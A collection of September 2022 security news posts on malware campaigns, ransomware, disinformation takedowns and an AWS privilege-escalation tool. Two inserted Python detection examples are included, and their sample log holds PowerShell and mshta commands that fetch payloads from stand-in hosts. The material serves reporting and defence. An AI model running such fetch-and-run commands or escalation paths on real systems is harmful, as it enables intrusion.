
Threat actors use Quantum Builder to deliver Agent Tesla malware

28 September 2022 at 15:43

The recently discovered malware builder Quantum Builder is being used by threat actors to deliver the Agent Tesla RAT.

A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT), Zscaler ThreatLabz researchers warn.

“Quantum Builder (aka “Quantum Lnk Builder”) is used to create malicious shortcut files. It has been linked to the Lazarus Group APT due to shared TTPs and source code overlaps, but we cannot confidently attribute this campaign to any specific threat actor.” reads the report published by Zscaler. “In this campaign, threat actors use Quantum Builder to generate malicious LNK, HTA, and PowerShell payloads which then deliver Agent Tesla on the targeted machines.”

Quantum Builder (aka “Quantum Lnk Builder”) is sold on the dark web and allows its operators to create malicious shortcut files. It can also generate malicious HTA, ISO, and PowerShell payloads that are used to drop the next-stage malware.

In the campaign observed by the experts, threat actors used the builder to generate malicious LNK, HTA, and PowerShell payloads, which are used to deliver Agent Tesla on the targeted machines.

Experts noticed that this campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to past attacks.

The attack chain observed by Zscaler starts with a spear-phishing email that carries an LNK file bundled in a GZIP archive. The messages masquerade as an order confirmation from a Chinese supplier of lump and rock sugar, with the LNK file disguised as a PDF document.

Quantum Builder message

Upon execution of the LNK file, the embedded PowerShell code spawns MSHTA, which then executes an HTA file hosted on a remote server.

The HTA file then decrypts a PowerShell loader script, which in turn AES-decrypts and GZIP-decompresses a second PowerShell script and loads it. That decrypted script is the downloader, which fetches and executes the Agent Tesla binary from a remote server. The malware runs with administrative privileges thanks to a UAC bypass that abuses CMSTP.

Quantum Builder

Below are the key features of this attack:

  • The threat actors are evolving their tactics by incorporating new infection chains that deliver Agent Tesla on target machines by leveraging the LNK and HTA payloads generated by a builder dubbed “Quantum Builder”.
  • Quantum Builder is sold in the cybercrime marketplace and is capable of generating LNK, HTA, and ISO payloads that use sophisticated techniques to download and execute the final payload through a multi-staged attack chain.
  • The in-memory PowerShell scripts decrypted by the Quantum Builder-generated HTA file perform a User Account Control (UAC) bypass via CMSTP in order to execute the final payload (Agent Tesla) with administrative rights. The UAC bypass is also used to add Windows Defender exclusions on the endpoint.
  • The chain utilizes Living Off the Land Binaries (LOLBins) to evade detection and camouflage the malicious activity.
  • It incorporates techniques such as decoys, UAC prompts and in-memory PowerShell to execute the final payload. These techniques are regularly updated by the developers of Quantum Builder.

In a second variant of the infection sequence, the GZIP archive is replaced by a ZIP file, while also adopting further obfuscation strategies to camouflage the malicious activity.

Quantum Builder has witnessed a surge in usage in recent months, with threat actors using it to distribute a variety of malware, such as RedLine Stealer, IcedID, GuLoader, RemcosRAT, and AsyncRAT.

“Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace. This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations.” concludes the report. “It incorporates sophisticated techniques to evade detections, and the techniques are updated regularly by the developers.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Agent Tesla)

The post Threat actors use Quantum Builder to deliver Agent Tesla malware appeared first on Security Affairs.

ONLINE DISINFORMATION: Under the hood of a Doppelgänger

28 September 2022 at 14:03

ONLINE DISINFORMATION is one of the defining issues of our time and the influence of fake news has become an acute threat to our society.

Disinformation undermines true journalism and steers public opinion on highly charged topics such as immigration, climate change, armed conflicts or refugee and health crises. Social media platforms are the battlefield of disinformation.

The war in Ukraine is no exception. This investigation presents how a large disinformation campaign targeting European audiences with pro-Russian propaganda was active on social media for months. What started as an investigation of media clones of the German Der Spiegel, Bild and T-Online turned out to be a fascinating dive into the multimedia world of disinformation production.

Tracing the infrastructure of a few websites helped us discover dozens of websites spreading Russian propaganda related to the war in Ukraine. The campaign undermined the Ukrainian government, its citizens, and the Western governments supporting Ukraine, and it supported the lifting of sanctions against Russia.

Qurium’s infrastructure research does not only show how European infrastructure has been used to host the fake news sites, but also how new domains have been registered to keep the campaign running in the very same physical servers.

Qurium’s investigation is the result of a collaboration with EU DisinfoLab, an independent non-profit organization focused on tackling sophisticated disinformation campaigns targeting the EU. Qurium has focused on the technical aspects of the campaign.

Qurium forensics report:
Under the hood of a Doppelgänger

EU DisinfoLab report:

Pierluigi Paganini

(SecurityAffairs – hacking, Disinformation)

APT28 relies on PowerPoint Mouseover to deliver Graphite malware

28 September 2022 at 13:47

The Russia-linked APT28 group is using mouse movement in decoy Microsoft PowerPoint documents to distribute malware.

The Russia-linked APT28 employed a technique relying on mouse movement in decoy Microsoft PowerPoint documents to deploy malware, researchers from Cluster25 reported.

Cluster25 researchers analyzed a lure PowerPoint document used to deliver a variant of the Graphite malware, which is known to be used exclusively by the APT28 group. The attack chain starts when the user opens the presentation mode and moves the mouse.

The user action starts the execution of a PowerShell script designed to download and run a dropper from OneDrive.

“The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive. The latter downloads a payload that extracts and injects in itself a new PE (Portable Executable) file, that the analysis showed to be a variant of a malware family known as Graphite, that uses the Microsoft Graph API and OneDrive for C&C communications.” reads the analysis published by Cluster25.

The lure document used a template potentially linked to The Organisation for Economic Co-operation and Development (OECD); it contains two slides, written in English and French respectively, with the same content.


The dropper is disguised as an image with a JPEG extension (DSC0002.jpeg) but is actually a DLL, which is later decrypted and written to C:\ProgramData\lmapi2.dll.

The last-stage malware is a version of Graphite; it communicates with the C2 servers through the domain graph[.]Microsoft[.]com (i.e., abusing the Microsoft Graph service) and OneDrive.

Graphite is fileless malware that runs in memory only and is used by threat actors to deliver post-exploitation frameworks such as Empire.

The analysis of metadata revealed that the nation-state actors employed the documents in a campaign between January and February 2022. However, the researchers noticed that URLs used in the attacks were still active in August and September, a circumstance that suggests the campaign is still ongoing.

Potential targets of the campaign are organizations and individuals operating in the defense and government sectors of countries in Europe and Eastern Europe.

“Such recent evidence could suggest some sort of activities still ongoing linked to the described threat or to some of its variants. Finally, based on several indicators, geopolitical objectives and the analyzed artifacts, Cluster25 attributes this campaign to the Russia-linked threat actor known as APT28 (aka Fancy Bear, TSAR Team, Pawn Storm, Sednit) and indicates entities and individuals operating in the defense and government sectors of Europe and Eastern Europe countries as potential targets.” concludes the report.
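Both the Quantum Builder chain described earlier (LNK -> PowerShell -> mshta fetching a remote HTA -> PowerShell -> cmstp UAC bypass) and the APT28 mouseover lure (PowerPoint -> PowerShell downloading a dropper from OneDrive) surface as unusual parent/child process relationships. The following added example, which is not code from Zscaler, Cluster25 or Security Affairs, encodes those relationships as detection rules and runs them over constructed process-creation events; the event format, PIDs, paths and URLs are all invented for the example.

```python
"""Process-chain detection for the Quantum Builder and APT28 chains above.

Added example; not code from Zscaler, Cluster25 or Security Affairs. The
event format, PIDs, paths and URLs are constructed for the example.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

SHELLS = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = SHELLS | {"mshta.exe", "wscript.exe", "cscript.exe"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # lowercased file name, directory stripped
    cmdline: str


def parse_events(lines: Iterable[str]) -> Dict[int, ProcEvent]:
    """Parse constructed 'pid|ppid|image path|command line' records by PID."""
    events: Dict[int, ProcEvent] = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        pid, ppid, image, cmdline = line.split("|", 3)
        name = image.strip().lower().rsplit("\\", 1)[-1]
        events[int(pid)] = ProcEvent(int(pid), int(ppid), name, cmdline.strip())
    return events


def ancestors(ev: ProcEvent, events: Dict[int, ProcEvent], depth: int = 4) -> List[ProcEvent]:
    """Parent chain, nearest parent first; bounded and safe against PID cycles."""
    chain: List[ProcEvent] = []
    seen = {ev.pid}
    cur: Optional[ProcEvent] = events.get(ev.ppid)
    while cur is not None and len(chain) < depth and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = events.get(cur.ppid)
    return chain


def detect(events: Dict[int, ProcEvent]) -> List[dict]:
    """Apply the three chain rules; each finding carries the full lineage."""
    findings: List[dict] = []
    for ev in events.values():
        lineage = ancestors(ev, events)
        parent = lineage[0].image if lineage else None
        chain = [p.image for p in reversed(lineage)] + [ev.image]
        rule = None
        # Rule 1 (Quantum Builder): PowerShell from the LNK spawns mshta with a remote HTA.
        if ev.image == "mshta.exe" and parent in SHELLS and REMOTE_URL.search(ev.cmdline):
            rule = "mshta_remote_hta_from_powershell"
        # Rule 2 (Quantum Builder): cmstp launched by a script host, the CMSTP UAC-bypass pattern.
        elif ev.image == "cmstp.exe" and parent in SCRIPT_HOSTS:
            rule = "cmstp_from_script_host"
        # Rule 3 (APT28): PowerPoint spawning PowerShell through the mouseover action.
        elif ev.image in SHELLS and parent == "powerpnt.exe":
            rule = "powershell_from_powerpoint"
        if rule:
            url = REMOTE_URL.search(ev.cmdline)
            findings.append({"rule": rule, "pid": ev.pid, "chain": chain,
                             "url": url.group(0) if url else None})
    return findings


# Constructed events: the two malicious chains plus two benign look-alikes.
SAMPLE_LOG = r"""
# pid|ppid|image path|command line
1000|1|C:\Windows\explorer.exe|explorer.exe
1100|1000|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -c "mshta https://hta.example.invalid/order.hta"
1200|1100|C:\Windows\System32\mshta.exe|mshta.exe https://hta.example.invalid/order.hta
1300|1200|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -file C:\Users\victim\AppData\Local\Temp\loader.ps1
1400|1300|C:\Windows\System32\cmstp.exe|cmstp.exe C:\Users\victim\AppData\Local\Temp\profile.inf
2000|1000|C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE|POWERPNT.EXE C:\Users\victim\Downloads\lure.ppsx
2100|2000|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -c "iwr https://onedrive.example.invalid/d/DSC0002.jpeg -OutFile $env:TEMP\DSC0002.jpeg"
3000|1000|C:\Windows\System32\mshta.exe|mshta.exe C:\Tools\helpdesk\local_page.hta
3100|1000|C:\Windows\System32\cmstp.exe|cmstp.exe /s C:\Windows\INF\corp_vpn.inf
""".splitlines()


def run_sample() -> List[dict]:
    return detect(parse_events(SAMPLE_LOG))


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f['rule']:34} pid={f['pid']:<5} {' -> '.join(f['chain'])}")
```

The two benign events (a local HTA and a cmstp run, both launched from explorer.exe) are deliberately not flagged, which is why the rules key on the parent rather than on the LOLBin name alone.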

Pierluigi Paganini

(SecurityAffairs – hacking, APT)

Bl00dy ransomware gang started using leaked LockBit 3.0 builder in attacks

28 September 2022 at 10:35

The recently born Bl00Dy Ransomware gang has started using the recently leaked LockBit ransomware builder in attacks in the wild.

The Bl00Dy Ransomware gang is the first group that started using the recently leaked LockBit ransomware builder in attacks in the wild.

Last week, an alleged disgruntled developer leaked the builder for the latest encryptor of the LockBit ransomware gang.

The latest version of the encryptor, version 3.0, was released by the gang in June. According to the gang, LockBit 3.0 has important novelties such as a bug bounty program, Zcash payment, and new extortion tactics. The gang has been active since at least 2019 and today it is one of the most active ransomware gangs.

The code of the encryptor was leaked on Twitter by at least a couple of accounts, @ali_qushji and @protonleaks1.

Unknown person @ali_qushji said his team has hacked the LockBit servers and found the possible builder of LockBit Black (3.0) Ransomware. You can check it on the GitHub repository https://t.co/wkaTaGA8y7 pic.twitter.com/cPSYipyIgs

— 3xp0rt (@3xp0rtblog) September 21, 2022

The builder is contained in a password-protected 7z archive, “LockBit3Builder.7z,” containing:

  • Build.bat;
  • builder.exe;
  • config.json;
  • keygen.exe.

The availability of the builder could allow any threat actor to create its own version of the ransomware, customizing it by modifying the configuration file.

BleepingComputer first reported that the Bl00Dy Ransomware group started using the LockBit 3.0 builder to create its own ransomware.

The group in past attacks created its own malware by using leaked builders, such as Babuk and Conti.

Early this week, the researcher Vladislav Radetskiy reported the discovery of a new Bl00Dy Ransomware Gang encryptor that was employed in an attack on a Ukrainian organization. The researcher did not immediately identify the ransomware family involved in the attack; it appeared to be either Conti or LockBit.

Just in case someone will want to know a little bit more about #Bl00dy #Ransomware TTP`s.
Here is my unfinished report (in English) https://t.co/DN0CMiuvo8 @vxunderground @malwrhunterteam @James_inthe_box @VK_Intel @TrellixLabs @AdvIntel @demonslay335 @ChristiaanBeek

— VR (@angel11VR) September 26, 2022

MalwareHunterTeam researchers confirmed that the encryptor used in the attack by the Bl00Dy Ransomware group was built using the leaked LockBit 3.0 builder.

So, there is already a ransomware gang that started using the leaked LockBit 3.0 builder: "BL00DY RANSOMWARE GANG".
😫 https://t.co/0uUBYIH7kq pic.twitter.com/Egv88ZY22w

— MalwareHunterTeam (@malwrhunterteam) September 26, 2022

BleepingComputer researchers, who tested the Bl00dy Ransomware Gang’s encryptor, confirmed that it was generated with the leaked LockBit 3.0 builder.

Pierluigi Paganini

(SecurityAffairs – hacking, Bl00Dy Ransomware)

NUVOLA: the new Cloud Security tool

28 September 2022 at 08:26

nuvola is a new open-source cloud security tool that addresses privilege escalation in cloud environments.

nuvola is a new open-source security tool created by the Italian cyber security researcher Edoardo Rosa (@_notdodo_), Security Engineer at Prima Assicurazioni. The tool was released during the RomHack 2022 security conference in Rome. It helps the security community address the complex topic of privilege escalation in cloud environments such as AWS.

The Privilege Escalations Drama

Privilege escalation is a common practice used by bad actors to gain entry into your most sensitive systems. They may start with a low-level account, but they exploit permissions and pathways to work their way up to a level of privilege where they are poised to cause irreparable damage, gain persistence or lock down the account.

Forrester estimated that 80% of security breaches involve privileged credentials. Many organizations have adopted cloud with such enthusiasm that they’ve failed to cover the fundamentals in security leaving many gaps for bad actors to find their way in.

Just like other forms of attacks, privilege escalation can go unnoticed, especially in a complex cloud environment where companies already have difficulty gaining visibility into their internal users, identities, and actions. A bad actor could spend days, if not weeks, inside your systems and you may not even know it. They could even expose sensitive data and, like in 50% of cases, you might be completely unaware of the breach until a third party informs you of it.

When it comes to AWS security, Identity and Access Management (IAM) permission misconfigurations have long held a spotlight, but that doesn’t mean they’re any easier to avoid. In reality, preventing privilege escalation begins with making it as difficult as possible by applying the principle of least privilege.

Still, with configuration issues and other vulnerabilities becoming commonplace in AWS architectures, it’s important to understand how bad actors could exploit our environments by studying the most common AWS privilege escalation techniques.

Cloud Security Context

Cloud is a continuously evolving space with new services, strategies, and technologies springing up seemingly overnight. Due to this, organizations regularly change and adapt their approach to cloud and cloud security.

A report from the Cloud Security Alliance (Technology and Cloud Security Maturity, 2022) states that 84% of organizations report having no automation; since Identity and Access Management is a key factor in securing companies, automating the detection of possible attack paths may reduce the attack surface and avoid potential data breaches.

Beyond the technological aspects, another Cloud Security Alliance report (The State of Cloud Security Risk, Compliance, and Misconfigurations, 2022) states that lack of knowledge and expertise is a well-known issue within the information security industry.

It is no surprise then, that lack of knowledge and expertise was consistently identified as:

  • the primary barrier to general cloud security (59%)
  • the primary cause of misconfigurations (62%)
  • a barrier to proactively preventing or fixing misconfigurations (59%)
  • the primary barrier to implementing auto-remediation (56%)

Also, from the same report, the primary reason organizations state for having a security incident due to misconfigurations is lack of visibility (68%).

A global overview is vital for both an attacker and a defender because it allows both security analysts and attackers to immediately find attack paths to remediate or abuse the system.

A full understanding of the environment from a high level enables companies to establish priorities and fulfill security requirements.

While IAM security is very important, an attacker may also abuse misconfigurations in the environment such as exposed resources (Alteryx, Twilio) or services; a Cloud Security Posture Management (CSPM) tool can help companies secure their assets by defining standard controls (CIS, PCI, NIST, SOC2) and custom rulesets to avoid false positives or increase detection of security issues.

While some tools that support AWS are very useful and greatly developed, many of them lack a global overview or features and the results must be manually reviewed, aggregated and ingested in other tools or custom scripts.

Entering nuvola

nuvola (with a lowercase n) is a tool to dump and perform automatic and manual security analysis of AWS environment configurations and services, using predefined, extensible and custom rules built on graphs and a simple YAML syntax.

The general idea behind this project is to create an abstracted digital twin of a cloud platform. For a more concrete example: nuvola mirrors the traits BloodHound uses for Active Directory analysis, but applied to cloud environments.

The usage of a graph database also increases the possibility of finding different and innovative attack paths and can be used as an offline, centralized and lightweight digital twin.

Like BloodHound, nuvola uses the advantages and principles of graph theory (implemented in the Neo4j graph database) to discover and reveal relationships between objects within a cloud ecosystem, enabling engineers to perform analysis.


Since Prima Assicurazioni believes in open source, the tool is created with a community mindset and without custom or company-specific constraints, to help us and other companies secure their AWS ecosystems. The tool also supports the creation of detection rules using YAML files, so that both experts and non-experts can contribute to the project.

For example, using nuvola we can define a YAML file to find all EC2 instances whose metadata endpoint has not been upgraded to v2. The syntax is easier than the one offered by Cypher, the query engine for Neo4j, allowing even non-hardcore analysts to perform assessments.


Figure. Output of a query to find vulnerable EC2 instances

The main advantage of using graphs is that we are able to find paths: from A to B.

We can find a vulnerable path using a YAML file to query all paths from all users or roles to a target, in this case the policy called AdministratorAccess, abusing the actions PassRole and CreateStack.


Figure. List of AWS roles which can perform privilege escalation to administrator

The output shown in the image above states that the cloudformation-deployer role can reach the AdministratorAccess policy, as can the temp-backend-api-role-runner role.
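The two queries described above (EC2 instances still on IMDSv1, and paths from users or roles to AdministratorAccess via PassRole and CreateStack) both boil down to a walk over a graph built from the account inventory. The following added example is not nuvola's code or its YAML rule syntax: it builds that kind of graph in memory from a constructed inventory (the role names echo the figure, but the policies, trust settings and instance ids are invented) and searches it, including the case where an explicit Deny removes the PassRole edge.

```python
"""Graph search for AWS privilege-escalation paths of the kind shown above.

Added example; not nuvola's code or its YAML rule syntax (nuvola keeps the graph
in Neo4j, this uses an in-memory adjacency map). The inventory is constructed:
role names echo the figure, but policies, trust settings and instances are invented.
"""
from collections import deque
from fnmatch import fnmatchcase
from typing import Dict, List, Optional, Set

TARGET = "policy:AdministratorAccess"
CFN_SERVICE = "cloudformation.amazonaws.com"

# Constructed policies (statements simplified to Effect + Action; Resource "*" assumed).
POLICIES: Dict[str, List[dict]] = {
    "AdministratorAccess": [{"Effect": "Allow", "Action": ["*"]}],
    "ReadOnlyAccess": [{"Effect": "Allow", "Action": ["*:Describe*", "*:List*", "*:Get*"]}],
    "cfn-deploy": [{"Effect": "Allow", "Action": ["cloudformation:CreateStack", "iam:PassRole"]}],
    "runner-inline": [{"Effect": "Allow", "Action": ["cloudformation:*", "iam:Pass*"]}],
    "cfn-no-passrole": [{"Effect": "Allow", "Action": ["cloudformation:*", "iam:PassRole"]},
                        {"Effect": "Deny", "Action": ["iam:PassRole"]}],
}
# Constructed principals: attached policies plus which AWS services may assume the role.
PRINCIPALS: Dict[str, dict] = {
    "role:cloudformation-deployer": {"policies": ["cfn-deploy"], "trusted_services": []},
    "role:temp-backend-api-role-runner": {"policies": ["runner-inline"], "trusted_services": []},
    "role:cfn-exec-admin": {"policies": ["AdministratorAccess"], "trusted_services": [CFN_SERVICE]},
    "role:readonly-auditor": {"policies": ["ReadOnlyAccess"], "trusted_services": []},
    "user:ops-user": {"policies": ["cfn-no-passrole"], "trusted_services": []},
}
# Constructed EC2 metadata options (HttpTokens is the real describe-instances field).
INSTANCES = [
    {"InstanceId": "i-0aaa111", "MetadataOptions": {"HttpTokens": "optional"}},
    {"InstanceId": "i-0bbb222", "MetadataOptions": {"HttpTokens": "required"}},
]


def allows(policy: str, action: str) -> bool:
    """Simplified IAM evaluation: wildcard matching, explicit Deny beats Allow."""
    def matches(stmt: dict) -> bool:
        return any(fnmatchcase(action.lower(), pat.lower()) for pat in stmt["Action"])
    stmts = POLICIES[policy]
    if any(s["Effect"] == "Deny" and matches(s) for s in stmts):
        return False
    return any(s["Effect"] == "Allow" and matches(s) for s in stmts)


def build_graph() -> Dict[str, Set[str]]:
    """Nodes are principals and policies; edges are relationships an attacker can follow."""
    nodes = list(PRINCIPALS) + [f"policy:{p}" for p in POLICIES]
    g: Dict[str, Set[str]] = {n: set() for n in nodes}
    cfn_roles = [r for r, d in PRINCIPALS.items() if CFN_SERVICE in d["trusted_services"]]
    for name, data in PRINCIPALS.items():
        for pol in data["policies"]:
            g[name].add(f"policy:{pol}")  # HAS_POLICY
            # PassRole + CreateStack: a stack can be launched under any
            # CloudFormation-trusted role, so the principal inherits that role's rights.
            if allows(pol, "iam:PassRole") and allows(pol, "cloudformation:CreateStack"):
                g[name].update(cfn_roles)  # CAN_ESCALATE_VIA_STACK
    return g


def paths_to_admin(g: Dict[str, Set[str]]) -> Dict[str, List[str]]:
    """Shortest path (BFS) from each principal to the AdministratorAccess policy."""
    found: Dict[str, List[str]] = {}
    for start in PRINCIPALS:
        prev: Dict[str, Optional[str]] = {start: None}
        queue = deque([start])
        while queue:
            node = queue.popleft()
            if node == TARGET:
                path: List[str] = []
                cur: Optional[str] = node
                while cur is not None:
                    path.append(cur)
                    cur = prev[cur]
                found[start] = path[::-1]
                break
            for nxt in sorted(g.get(node, ())):
                if nxt not in prev:
                    prev[nxt] = node
                    queue.append(nxt)
    return found


def imdsv1_instances() -> List[str]:
    """EC2 instances still answering IMDSv1 requests (HttpTokens not 'required')."""
    return [i["InstanceId"] for i in INSTANCES
            if i["MetadataOptions"].get("HttpTokens") != "required"]


if __name__ == "__main__":
    for principal, path in paths_to_admin(build_graph()).items():
        print(" -> ".join(path))
    print("IMDSv1 still enabled:", imdsv1_instances())
```

The ops-user principal has the same Allow as the runner role but an explicit Deny on iam:PassRole, so it gets no escalation edge; the same evaluation order (Deny first) is what a real IAM check has to respect.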

The nuvola source code is available on GitHub. For further technical details about the inner workings and usage of the tool, check the project wiki and the RomHack 2022 slide deck.

About the author: Luca Mella, Cyber Security Expert, Response & Threat Intel | Manager

In 2019, Luca was mentioned as one of the “32 Influential Malware Research Professionals”. He is a former member of the ANeSeC CTF team, one of the first Italian cyber war-game teams, born back in 2011.

Pierluigi Paganini

(SecurityAffairs – hacking, cloud computing)

Meta dismantled the largest Russian network since the war in Ukraine began

28 September 2022 at 07:43

Meta dismantled a network of Facebook and Instagram accounts spreading disinformation across European countries.

Meta announced that it has taken down a huge Russian network of Facebook and Instagram accounts used to spread disinformation published on more than 60 websites impersonating news organizations across Europe. The disinformation operation began in May 2022; the network primarily targeted Germany, France, Italy, Ukraine and the UK, spreading fake content related to the war in Ukraine and its impact on Europe. Meta pointed out that this is the largest and most complex Russian operation it has disrupted since the war in Ukraine began.

The shared articles criticized Ukraine and Ukrainian refugees, applauded Russia, and argued that Western sanctions on Russia would backfire.

“We took down a large network that originated in Russia and targeted primarily Germany, and also France, Italy, Ukraine and the United Kingdom. The operation began in May of this year and centered around a sprawling network of over 60 websites carefully impersonating legitimate news organizations in Europe, including Spiegel, The Guardian, Bild and ANSA.” reads the report published by Meta.

“There, they would post original articles that criticized Ukraine and Ukrainian refugees, supported Russia and argued that Western sanctions on Russia would backfire.”

Meta Russia disinformation

Below is a list of domains used to impersonate legitimate news organizations:

Threat actors behind this operation promoted the articles and also original memes and YouTube videos across many internet services, including Facebook, Instagram, Telegram, Twitter, petitions websites Change.org and Avaaz, and even LiveJournal.

“The amplification on social media, on the other hand, relied primarily on crude ads and fake accounts. In fact, on our platforms, the majority of the accounts, Pages and ads were detected and removed by our automated systems before we even began our investigation.” continues the report. “Together, these two approaches worked as an attempted smash-and-grab against the information environment, rather than a serious effort to occupy it long-term.”

Meta shared some numbers related to this campaign:

  • Presence on Facebook and Instagram: 1,633 accounts, 703 Pages, one Group and 29 accounts on Instagram.
  • Followers: About 4,000 accounts followed one or more of these Pages, less than 10 accounts joined this Group and about 1,500 accounts followed one or more of these Instagram accounts.
  • Advertising: Around $105,000 in spending for ads on Facebook and Instagram, paid for primarily in US dollars and euros.

Meta also disrupted for the first time a Chinese network focused on U.S. domestic politics. The Chinese-origin influence operation also targeted the Czech Republic. It ran across Facebook, Instagram, Twitter, and also two petition platforms in Czechia.

Pierluigi Paganini

(SecurityAffairs – hacking, disinformation)

North Korea-linked Lazarus continues to target job seekers with macOS malware

27 September 2022 at 20:39

North Korea-linked Lazarus APT group is targeting macOS users searching for jobs in the cryptocurrency industry.

North Korea-linked Lazarus APT group continues to target macOS with a malware campaign using job opportunities as a lure. The attackers aimed at stealing credentials for the victims’ wallets.

Last week, SentinelOne researchers discovered decoy documents advertising positions at the popular cryptocurrency exchange Crypto.com.

The SentinelOne investigation builds on a previous one conducted by ESET in August, when the Lazarus APT was observed targeting job seekers with macOS malware that runs on both Intel and M1 chipsets.

ESET published a series of tweets detailing the attacks; the experts spotted a signed Mac executable disguised as a job description for Coinbase. The malicious code was uploaded to VirusTotal from Brazil on August 11, 2022.

Lazarus APT has used this kind of lure in multiple campaigns since at least 2020, including a campaign dubbed ‘Operation Dream Job’.

The researchers have no evidence on how the malware is being distributed, but earlier reports on Operation In(ter)ception suggested that the threat actors initially established a contact with the victims via targeted messaging on LinkedIn.

The first-stage dropper employed in the latest campaign is a Mach-O binary built from a template similar to that of the safarifontsagent binary used in the Coinbase attacks.

The dropper launches the decoy PDF file, a 26-page document containing all vacancies at Crypto.com, and wipes the Terminal’s current savedState (“com.apple.Terminal.savedState”).

The second stage in the Crypto.com variant is a bare-bones application bundle named “WifiAnalyticsServ.app”; it mirrors the architecture employed in the Coinbase campaign.

The second-stage malware extracts and executes the third-stage binary.

“The main purpose of the second-stage is to extract and execute the third-stage binary, wifianalyticsagent. This functions as a downloader from a C2 server. The Coinbase variant used the domain concrecapital[.]com.” reads the analysis published by SentinelOne. “In the Crypto.com sample, this has changed to market.contradecapital[.]com.”

The experts were not able to determine the last-stage payload because the C2 server responsible for hosting the malware was offline at the time of the analysis.

Hardcoded C2 in the third-stage downloader (Source: SentinelOne)

Experts pointed out that the threat actors have made no effort to encrypt or obfuscate the binaries employed in the attacks, a circumstance that indicates the attackers were conducting short-term campaigns and/or had little fear of detection by their targets.

“The Lazarus (aka Nukesped) threat actor continues to target individuals involved in cryptocurrency exchanges. This has been a long-running theme going as far back as the AppleJeus campaigns that began in 2018. Operation In(ter)ception appears to be extending the targets from users of crypto exchange platforms to their employees in what may be a combined effort to conduct both espionage and cryptocurrency theft.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – hacking, Lazarus)

Defense firm Elbit Systems of America discloses data breach

27 September 2022 at 15:37

Elbit Systems of America, a subsidiary of defense giant Elbit Systems, disclosed a data breach after Black Basta ransomware gang claimed to have hacked it.

In late June, the Black Basta ransomware gang claimed to have hacked Elbit Systems of America; the extortion group added the name of the company to its Tor leak site. Elbit Systems of America, LLC is a U.S.-based wholly owned subsidiary of Elbit Systems Ltd., a leading global source of innovative, technology-based systems for diverse defense and commercial applications.

Now the company has confirmed the data breach that took place on June 8, 2022 and impacted 369 people.

The company discovered the security breach after noticing unusual activity on its network; in response to the intrusion, it shut down its systems to prevent the threat from spreading.

“On June 8, 2022, Elbit America discovered unusual activity in its network environment. Elbit America immediately shut down its network and took steps to secure its environment. Elbit America also engaged a leading, independent cybersecurity firm to assist Elbit America with safely restoring its operations, to investigate the incident, and to determine if any personal information was affected as quickly as possible.” reads the data breach notification sent to the Maine Attorney General’s office. “Through this investigation, on June 15, 2022, Elbit America learned that personal information belonging to certain employees may have been acquired without authorization. Out of an abundance of caution, Elbit America notified all employees on July 1, 2022, including four (4) Maine

Exposed data may have included individuals’ names, addresses, Social Security numbers, dates of birth, direct deposit information, and ethnicity.

The company already notified impacted individuals and is offering them 12 months of free identity protection and credit monitoring services.

Some of the documents published by the Black Basta gang on its leak site as proof of the hack included an audit report, confidentiality agreements, and a payroll report.

Black Basta has been active since April 2022; like other ransomware operations, it implements a double-extortion attack model.

The ransomware appends the .basta extension to the encrypted filenames and creates ransom notes named readme.txt in each folder.

Pierluigi Paganini

(SecurityAffairs – hacking, Elbit Systems of America)

WhatsApp fixed critical and high severity vulnerabilities

27 September 2022 at 13:13

WhatsApp has addressed two severe Remote Code Execution vulnerabilities affecting the mobile version of the software.

WhatsApp has published three security advisories for 2022: two cover the CVE-2021-24042 and CVE-2021-24043 vulnerabilities discovered in January and February, and the third covers CVE-2022-36934 and CVE-2022-27492, fixed by the company in September.

The CVE-2022-36934 flaw (CVSS score 9.8) is an integer overflow in WhatsApp that impacts Android versions prior to v2.22.16.12, Business for Android prior to v2.22.16.12, iOS prior to v2.22.16.12 and Business for iOS prior to v2.22.16.12. An attacker can exploit the flaw to achieve remote code execution in an established video call.

“This RCE bug affects a piece of code in the WhatsApp component Video Call Handler, which allows an attacker to manipulate the bug to trigger a heap-based buffer overflow and take complete control of WhatsApp Messenger.” reads a post published by MalwareBytes.

whatsapp undisclosed flaws

The CVE-2022-27492 flaw (CVSS score 7.8) is an integer underflow that impacts WhatsApp for Android prior to v2.22.16.2 and WhatsApp for iOS prior to v2.22.15.9. An attacker can gain remote code execution by sending the victim a crafted video file.

“This RCE bug affects an unspecified code block of the component Video File Handler. The manipulation with an unknown input leads to a memory corruption vulnerability. To exploit this vulnerability, attackers would have to drop a crafted video file on the user’s WhatsApp messenger and convince the user to play it.” states MalwareBytes.

Pierluigi Paganini

(SecurityAffairs – hacking, RCE)

Erbium info-stealing malware, a new option in the threat landscape

27 September 2022 at 09:40

The recently discovered Erbium information-stealer is being distributed as fake cracks and cheats for popular video games.

Threat actors behind the new ‘Erbium’ information-stealing malware are distributing it as fake cracks and cheats for popular video games to steal victims’ credentials and cryptocurrency wallets.

The Erbium info-stealing malware was first spotted by researchers at threat intelligence firm Cluster25 on July 21, 2022. The Malware-as-a-Service (MaaS) was advertised on a Dark Web forum by a Russian-speaking threat actor.

The author said that he spent several months developing Erbium which supports unique functionalities. According to cybersecurity firm Cyfirma, the Erbium Stealer supports the following capabilities:

  • Ability to enumerate drives.
  • Ability to enumerate paths, files, and folders.
  • Capability to load other libraries, processes, and DLLs in memory.
  • Ability to gather system information.
  • Network communication capability.
  • Collecting user credentials, such as passwords, from a range of popular chat and email programs, as well as web browsers.
